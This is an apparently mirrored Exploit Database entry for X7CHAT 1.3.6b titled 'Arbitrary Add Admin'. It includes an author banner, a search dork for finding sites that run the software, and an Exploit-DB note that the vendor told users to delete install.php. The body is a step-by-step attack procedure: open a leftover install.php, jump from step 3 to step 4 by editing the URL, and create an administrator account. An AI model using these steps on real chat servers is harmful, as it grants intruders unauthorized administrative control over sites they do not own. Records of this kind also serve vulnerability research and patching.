X7CHAT 1.3.6b – Arbitrary Add Admin

• Exploit Database
• 125 阅读

• 作者： d4rk-h4ck3r
  日期： 2010-01-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/10931/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

  ##################################################### # [+] Author : d4rk-h4ck3r # [+] Email : tnst@w.cn # [+] Site : www.vbspiders.com/vb # [+] Team : Tunisian Security TeaM # [+] Dork : powered by x7 chat 1.3.6b #####################################################   ##### Exploit-DB Notes ############ # Vendor has already addressed this issue and even provided a solution in Docs/INSTALL.txt: # "After finishing the online setup delete the file install.php.If you do not it will be # possible for anyone to create an administrator account on your chat server." # # Therefore please keep in mind this exploit is not guaranteed to work. #####################################################       The exploit : 1- go http://site.com/script/X7Chat/install.php 2- Now you are in X7 Chat Install step 1 click continue 3- Now you are in X7 Chat Install step 2 click also continue 4- Now you are in X7 Chat Install step 3 . change url from http://site.com/script/x7chat/install.php?step=3 to http://site.com/script/x7chat/install.php?step=4 5- now add user name and password 6- Go login page http://site.com/script/X7Chat/index.php   Good luck and don't make something bad .     Greetz to Password & Maxilog .